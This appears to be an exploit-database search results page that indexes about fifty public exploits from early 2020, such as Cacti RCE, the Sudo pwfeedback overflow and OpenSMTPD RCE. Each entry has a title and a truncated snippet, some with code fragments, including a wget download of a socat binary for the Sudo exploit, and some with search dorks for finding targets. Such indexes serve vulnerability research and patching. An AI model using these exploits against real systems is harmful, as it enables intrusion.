47904 matches found
Online Job Portal 1.0 - Remote Code Execution
Exploit Title: Online Job Portal 1.0 - Remote Code Execution Dork: N/A Date: 2020-02-06 Exploit Author: Ihsan Sencan Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html Software Link:...
TapinRadio 2.12.3 - 'address' Denial of Service (PoC)
Exploit Title: TapinRadio 2.12.3 - 'address' Denial of Service PoC Discovery by: chuyreds Discovery Date: 2020-02-05 Vendor Homepage: http://www.raimersoft.com/rarmaradio.html Software Link : http://www.raimersoft.com/downloads/tapinradiosetupx64.exe Tested Version: 2.12.3 Vulnerability Type:...
AbsoluteTelnet 11.12 - 'license name' Denial of Service (PoC)
Exploit Title: AbsoluteTelnet 11.12 - "license name" Denial of Service PoC Discovery by: chuyreds Discovery Date: 2020-02-05 Vendor Homepage: https://www.celestialsoftware.net/ Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe Tested Version: 11.12 Vulnerability Typ...
RarmaRadio 2.72.4 - 'server' Denial of Service (PoC)
Exploit Title: RarmaRadio 2.72.4 - 'server' Denial of Service PoC Discovery by: chuyreds Discovery Date: 05-02-2020 Vendor Homepage: http://www.raimersoft.com/rarmaradio.html Software Link : http://www.raimersoft.com/downloads/rarmaradiosetup.exe Tested Version: 2.72.4 Vulnerability Type: Denial ...
Ecommerce Systempay 1.0 - Production KEY Brute Force
Exploit Title: Ecommerce Systempay 1.0 - Production KEY Brute Force Author: live3 Date: 2020-02-05 Vendor Homepage: https://paiement.systempay.fr/doc/fr-FR/ Software Link: https://paiement.systempay.fr/doc/fr-FR/module-de-paiement-gratuit/ Tested on: MacOs Version: ALL ?php / INFORMATION Exploit...
Cisco Data Center Network Manager 11.2 - Remote Code Execution
!/usr/bin/python """ Cisco Data Center Network Manager SanWS importTS Command Injection Remote Code Execution Vulnerability Tested on: Cisco DCNM 11.2.1 Installer for Windows 64-bit - Release: 11.21 - Release Date: 18-Jun-2019 - FileName: dcnm-installer-x64-windows.11.2.1.exe.zip - Size: 1619.36 ...
AbsoluteTelnet 11.12 - 'SSH2/username' Denial of Service (PoC)
Exploit Title: AbsoluteTelnet 11.12 - 'SSH2/username' Denial of Service PoC Discovery by: chuyreds Discovery Date: 2020-02-05 Vendor Homepage: https://www.celestialsoftware.net/ Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe Tested Version: 11.12 Vulnerability...
Sudo 1.8.25p - 'pwfeedback' Buffer Overflow
!/bin/bash We will need socat to run this. if ! -f socat ; then wget https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x8664/socat chmod +x socat fi cat xpl.pl $bufsz = 256; $askpasssz = 32; $signosz = 465; $tgetpassflag = "\x04\x00\x00\x00" . "\x00"x24;...
xglance-bin 11.00 - Privilege Escalation
Exploit Title: xglance-bin 11.00 - Privilege Escalation Exploit Author: Robert Jaroszuk and Marco Ortisi RedTimmy Security Date: 2020-02-01 Tested on: RHEL 5.x/6.x/7.x/8.x CVE: CVE-2014-2630 Disclamer: This exploit is for educational purpose only More details on...
AVideo Platform 8.1 - Information Disclosure (User Enumeration)
Exploit Title: AVideo Platform 8.1 - Information Disclosure User Enumeration Dork: N/A Date: 2020-02-05 Exploit Author: Ihsan Sencan Vendor Homepage: https://avideo.com Software Link: https://github.com/WWBN/AVideo Version: 8.1 Tested on: Linux CVE: N/A POC: 1...
Kronos WebTA 4.0 - Authenticated Remote Privilege Escalation
Exploit Title: Kronos WebTA 4.0 - Authenticated Remote Privilege Escalation Discovered by: Elwood Buck & Nolan B. Kennedy of Mindpoint Group Exploit Author: Nolan B. Kennedy nxkennedy Discovery date: 2019-09-20 Vendor Homepage: https://www.kronos.com/products/kronos-webta Version: 3.8.x - 4.0...
Wago PFC200 - Authenticated Remote Code Execution (Metasploit)
Exploit Title: Wago PFC200 - Authenticated Remote Code Execution Metasploit Date: 2020-02-05 Exploit Author: Nico Jansen 0x483d Vendor Homepage: https://www.wago.com/ Version: 'Wago PFC200 authenticated remote code execution', 'Description' = %q The Wago PFC200 up to incl. Firmware 11 020835 is...
Socat 1.7.3.4 - Heap-Based Overflow (PoC)
Exploit Title: Socat 1.7.3.4 - Heap Based Overflow PoC Date: 2020-02-03 Exploit Author: hieubl from HPT Cyber Security Vendor Homepage: http://www.dest-unreach.org/ Software Link: http://www.dest-unreach.org/socat/ Version: 1.7.3.4 Tested on: Ubuntu 16.04.6 LTS CVE : Heap-Based Overflow due to...
HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account
Exploit Title: HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account Dork: N/A Date: 2020-02-03 Exploit Author: Snawoot Vendor Homepage: http://www.hisilicon.com Product Link: http://www.hisilicon.com/en/Products Version: hi3520d Tested on: Linux CVE: N/A References:...
Verodin Director Web Console 3.5.4.0 - Remote Authenticated Password Disclosure (PoC)
Exploit Title: Verodin Director Web Console 3.5.4.0 - Remote Authenticated Password Disclosure PoC Discovery Date: 2019-01-31 Exploit Author: Nolan B. Kennedy nxkennedy Vendor Homepage: https://www.verodin.com/ Software Link : https://www.verodin.com/demo-request/demo-request-form Tested Versions...
AVideo Platform 8.1 - Cross Site Request Forgery (Password Reset)
Exploit Title: AVideo Platform 8.1 - Cross Site Request Forgery Password Reset Dork: N/A Date: 2020-02-05 Exploit Author: Ihsan Sencan Vendor Homepage: https://avideo.com Software Link: https://github.com/WWBN/AVideo Version: 8.1 Tested on: Linux CVE: N/A POC: 1...
Centreon 19.10.5 - 'Pollers' Remote Command Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Centreon Poller Authenticated Remote Command Execution', 'Description' = %q TODO , 'Author' = 'Omri Baso', discovery 'Fabien Aunay', discovery...
Sudo 1.8.25p - 'pwfeedback' Buffer Overflow (PoC)
Title: Sudo 1.8.25p - Buffer Overflow Date: 2020-01-30 Author: Joe Vennix Software: Sudo Versions: Sudo versions prior to 1.8.26 CVE: CVE-2019-18634 Reference: https://www.sudo.ws/alerts/pwfeedback.html Sudo's pwfeedback option can be used to provide visual feedback when the user is inputting the...
F-Secure Internet Gatekeeper 5.40 - Heap Overflow (PoC)
Title: F-Secure Internet Gatekeeper 5.40 - Heap Overflow PoC Date: 2020-01-30 Author: Kevin Joensen Vendor: F-Secure Software: https://www.f-secure.com/en/business/downloads/internet-gatekeeper CVE: N/A Reference: https://blog.doyensec.com/2020/02/03/heap-exploit.html from pwn import import time...
phpList 3.5.0 - Authentication Bypass
Exploit Title: phpList 3.5.0 - Authentication Bypass Google Dork: N/A Date: 2020-02-03 Exploit Author: Suvadip Kar Author Contact: https://twitter.com/spidersec Vendor Homepage: https://www.phplist.org Software Link: https://www.phplist.org/download-phplist/ Version: 3.5.0 Tested on: Linux CVE :...
School ERP System 1.0 - Cross Site Request Forgery (Add Admin)
Title: School ERP System 1.0 - Cross Site Request Forgery Add Admin Date: 2020-01-31 Exploit Author: J3rryBl4nks Vendor Homepage: https://sourceforge.net/projects/school-erp-ultimate/files/ Software Link: https://sourceforge.net/projects/school-erp-ultimate/files/ Version ERP-Ultimate CVE:...
P2PWIFICAM2 for iOS 10.4.1 - 'Camera ID' Denial of Service (PoC)
Exploit Title: P2PWIFICAM2 for iOS 10.4.1 - 'Camera ID' Denial of Service PoC Discovery by: Ivan Marmolejo Discovery Date: 2020-02-02 Vendor Homepage: https://apps.apple.com/mx/app/p2pwificam2/id663665207 Software Link: App Store for iOS devices Tested Version: 10.4.1 Vulnerability Type: Denial o...
Cacti 1.2.8 - Authenticated Remote Code Execution
!/usr/bin/python3 Exploit Title: Cacti v1.2.8 Remote Code Execution Date: 03/02/2020 Exploit Author: Askar @mohammadaskar2 CVE: CVE-2020-8813 Vendor Homepage: https://cacti.net/ Version: v1.2.8 Tested on: CentOS 7.3 / PHP 7.1.33 import requests import sys import warnings from bs4 import...
Cacti 1.2.8 - Unauthenticated Remote Code Execution
!/usr/bin/python3 Exploit Title: Cacti v1.2.8 Unauthenticated Remote Code Execution Date: 03/02/2020 Exploit Author: Askar @mohammadaskar2 CVE: CVE-2020-8813 Vendor Homepage: https://cacti.net/ Version: v1.2.8 Tested on: CentOS 7.3 / PHP 7.1.33 import requests import sys import warnings from bs4...
Jira 8.3.4 - Information Disclosure (Username Enumeration)
Exploit Title: Jira 8.3.4 - Information Disclosure Username Enumeration Date: 2019-09-11 Exploit Author: Mufeed VH Vendor Homepage: https://www.atlassian.com/ Software Link: https://www.atlassian.com/software/jira Version: 8.3.4 Tested on: Pop!OS 19.10 CVE : CVE-2019-8449 CVE-2019-8449 Exploit fo...
BearFTP 0.1.0 - 'PASV' Denial of Service
Exploit Title: BearFTP 0.1.0 - 'PASV' Denial of Service Date: 2020-01-29 Exploit Author: kolya5544 Vendor Homepage: http://iktm.me/ Software Link: https://github.com/kolya5544/BearFTP/releases Version: v0.0.1 - v0.1.0 Tested on: Ubuntu 18.04 CVE : CVE-2020-8416 static void Mainstring args...
Schneider Electric U.Motion Builder 1.3.4 - Authenticated Command Injection
Exploit Title: Schneider Electric U.Motion Builder 1.3.4 - Authenticated Command Injection Date: 2018-08-01 Exploit Author: Cosmin Craciun Vendor Homepage: https://www.se.com Version: = 1.3.4 Tested on: Delivered Virtual Appliance running on Windows 10 x64 CVE : CVE-2018-7777 References:...
IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting
Title: IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting Date: 2020-01-27 Author: Lutfu Mert Ceylan Vendor Homepage: www.icewarp.com Tested on: Windows 10 Versions: 11.4.4.1 and before Vulnerable Parameter: "color" Get Method Google Dork: inurl:/webmail/ intext:Powered by IceWarp Server...
Lotus Core CMS 1.0.1 - Local File Inclusion
Exploit Title: Lotus Core CMS 1.0.1 - Local File Inclusion Google Dork: N/A Date: 2020-01-31 Exploit Author: Daniel Monzón stark0de Vendor Homepage: http://lotuscore.sourceforge.net/ Software Link: https://sourceforge.net/projects/lotuscore/files/latest/download Version: 1.0.1 Tested on: Windows ...
FlexNet Publisher 11.12.1 - Cross-Site Request Forgery (Add Local Admin)
Exploit Title: FlexNet Publisher 11.12.1 - Cross-Site Request Forgery Add Local Admin Date: 2019-12-29 Exploit Author: Ismail Tasdelen Vendor Homepage: https://www.flexerasoftware.com/ Software : FlexNet Publisher Product Version: v11.12.1 Product :...
rConfig 3.9.3 - Authenticated Remote Code Execution
Exploit Title: rConfig 3.9.3 - Authenticated Remote Code Execution Date: 2019-11-07 CVE-2019-19509 Exploit Author: vikingfr Vendor Homepage: https://rconfig.com/ see also : https://github.com/rconfig/rconfig Software Link : http://files.rconfig.com/downloads/scripts/centos7install.sh Version:...
Microsoft Windows Media Center WMV / WMA 6.3.9600.16384 - Code Execution
Exploit Title: Microsoft Windows Media Center WMV or WMA 6.3.9600.16384 - Code Execution Google Dork: n/a Date: 2020-01-29 Exploit Author: Eduardo Braun Prado Vendor Homepage: http://www.microsoft.com/ Software Link: http://www.microsoft.com/ Version: 6.3.9600.16384 Tested on: Windows 7, 8.1, 10...
PHP 7.0 < 7.4 (Unix) - 'debug_backtrace' disable_functions Bypass
a; $backtrace = new Exception-getTrace; ; if!isset$backtrace1'args' PHP = 7.4 $backtrace = debugbacktrace; class Helper public $a, $b, $c, $d; function str2ptr&$str, $p = 0, $s = 8 $address = 0; for$j = $s-1; $j = 0; $j-- $address = 8; return $out; function write&$str, $p, $v, $n = 8 $i = 0; for$...
OpenSMTPD 6.6.1 - Remote Code Execution
Exploit Title: OpenSMTPD 6.6.1 - Remote Code Execution Date: 2020-01-29 Exploit Author: 1F98D Original Author: Qualys Security Advisory Vendor Homepage: https://www.opensmtpd.org/ Software Link: https://github.com/OpenSMTPD/OpenSMTPD/releases/tag/6.6.1p1 Version: OpenSMTPD '.formatsys.argv0...
XMLBlueprint 16.191112 - XML External Entity Injection
Exploit Title: XMLBlueprint 16.191112 - XML External Entity Injection Exploit Author: Javier Olmedo Date: 2018-11-14 Vendor: XMLBlueprint XML Editor Software Link: https://www.xmlblueprint.com/update/download-64bit.exe Affected Version: 16.191112 and before Patched Version: unpatched Category:...
Cups Easy 1.0 - Cross Site Request Forgery (Password Reset)
Title: Cups Easy 1.0 - Cross Site Request Forgery Password Reset Date: 2020-01-28 Exploit Author: J3rryBl4nks Vendor Homepage: https://sourceforge.net/u/ajayshar76/profile/ Software Link: https://sourceforge.net/projects/cupseasy/files/cupseasylive-1.0/ Version: 1.0 Tested on Windows 10/Kali...
Fifthplay S.A.M.I 2019.2_HP - Persistent Cross-Site Scripting
Exploit Title: Fifthplay S.A.M.I 2019.2HP - Persistent Cross-Site Scripting Date: 2020-01-29 Exploit Author: LiquidWorm Vendor: Fifthplay NV Vendor Homepage: https://www.fifthplay.com Version: 2019.2HP Tested on: Linux CVE : - Fifthplay S.A.M.I - Service And Management Interface Unauthenticated...
Centreon 19.10.5 - 'Pollers' Remote Command Execution
Exploit Title: Centreon 19.10.5 - 'Pollers' Remote Command Execution Date: 2020-01-27 Exploit Author: Omri Baso, Fabien Aunay Vendor Homepage: https://www.centreon.com/ Software Link: https://github.com/centreon/centreon Version: 19.10.5 Tested on: CentOS 7.7 CVE : - Centreon 19.10.5 Remote Comma...
Satellian 1.12 - Remote Code Execution
Exploit Title: Satellian 1.12 - Remote Code Execution Date: 2020-01-28 Exploit Author: Xh4H Vendor Homepage: https://www.intelliantech.com/?lang=en Version: v1.12+ Tested on: Kali linux, MacOS CVE : CVE-2020-7980 Github repository: https://github.com/Xh4H/Satellian-CVE-2020-7980 xh4h@Macbook-xh4h...
Centreon 19.10.5 - 'centreontrapd' Remote Command Execution
Exploit Title: Centreon 19.10.5 - 'centreontrapd' Remote Command Execution Date: 2020-01-29 Exploit Author: Fabien AUNAY, Omri Baso Vendor Homepage: https://www.centreon.com/ Software Link: https://github.com/centreon/centreon Version: 19.10.5 Tested on: CentOS 7 CVE : - Centreon 19.10.5 Remote...
Kibana 6.6.1 - CSV Injection
Exploit Title: Kibana 6.6.1 - CSV Injection Google Dork: inurl:"/app/kibana" intitle:"Kibana" Date: 2020-01-15 Exploit Author: Aamir Rehman Vendor Homepage: https://www.elastic.co/kibana Software Link: https://www.elastic.co/downloads/ Version: v6.6.1 possibly latest versions Tested on: Kibana...
Microsoft Windows 10 - Theme API 'ThemePack' File Parsing
Exploit Title: Microsoft Windows 10 - Theme API 'ThemePack' File Parsing Google Dork: n/a Date: 2020-10-28 Exploit Author: Eduardo Braun Prado Vendor Homepage: http://www.microsoft.com/ Software Link: http://www.microsoft.com/ Version: 10 v.1803 17134.407 Tested on: Windows 7, 8.0, 8.1, 10, Serve...
Liferay CE Portal 6.0.2 - Remote Command Execution
Exploit Title: Liferay CE Portal 6.0.2 - Remote Command Execution Google Dork: N/A Date: 2020-01-29 Exploit Author: Berk Dusunur Vendor Homepage: https://www.liferay.com/ Software Link: https://sourceforge.net/projects/lportal/files/Liferay%20Portal/6.0.2/...
Octeth Oempro 4.8 - 'CampaignID' SQL Injection
Exploit Title: Octeth Oempro 4.8 - 'CampaignID' SQL Injection Date: 2020-01-27 Exploit Author: Bruno de Barros Bulle www.xlabs.com.br Vendor Homepage: www2.octeth.com Version: Octeth Oempro v.4.7 and v.4.8 Tested on: Oempro v.4.7 CVE : CVE-2019-19740 An authenticated user can easily exploit this...
Centreon 19.10.5 - Remote Command Execution
Exploit Title: Centreon 19.10.5 - Remote Command Execution Date: 2020-01-27 Exploit Author: Fabien AUNAY, Omri BASO Vendor Homepage: https://www.centreon.com/ Software Link: https://github.com/centreon/centreon Version: 19.10.5 Tested on: CentOS 7 CVE : - Centreon 19.10.5 Remote Command Execution...
macOS/iOS ImageIO - Heap Corruption when Processing Malformed TIFF Image
The attached tiff image causes a crash in ImageIO on the latest macOS and iOS. To reproduce the issue, the attached code tester.m can be used. I've attached another code snippet to reproduce the issue on iOS as well. With tester.m compiled with ASAN, processing the attached tiff image should cras...
Centreon 19.10.5 - Database Credentials Disclosure
Exploit Title: Centreon 19.10.5 - Database Credentials Disclosure Date: 2020-01-27 Exploit Author: Fabien AUNAY, Omri Baso Vendor Homepage: https://www.centreon.com/ Software Link: https://github.com/centreon/centreon Version: 19.10.5 Tested on: CentOS 7 CVE : - Centreon 19.10.5 Database...
Adive Framework 2.0.8 - Cross-Site Request Forgery (Change Admin Password)
Exploit Title: Adive Framework 2.0.8 - Cross-Site Request Forgery Change Admin Password Exploit Author: Sarthak Saini Date: 2020-01-18 Vendor Link : https://www.adive.es/ Software Link: https://github.com/ferdinandmartin/adive-php7 Version: 2.0.8 CVE:CVE-2020-7991 Category: Webapps Tested on:...
Microsoft Windows Kernel - Information Disclosure
PoC for the SWAPGS attack CVE-2019-1125 This holds the sources for the SWAPGS attack PoC publicly shown at Black Hat USA, 2019. Contents leakgsbkva - variant 1 look for random values in kernel memory; limited to PE kernel image header leakgsbkvat - variant 2 extract random values from kernel...
Torrent 3GP Converter 1.51 - Stack Overflow (SEH)
Exploit Title: Torrent 3GP Converter 1.51 - Stack Overflow SEH Exploit Author: boku Date: 2020-01-24 Software Vendor: torrentrockyou Vendor Homepage: http://www.torrentrockyou.com Software Link: http://www.torrentrockyou.com/download/tr3gpconverter.exe Version: Torrent 3GP Converter Version 1.51...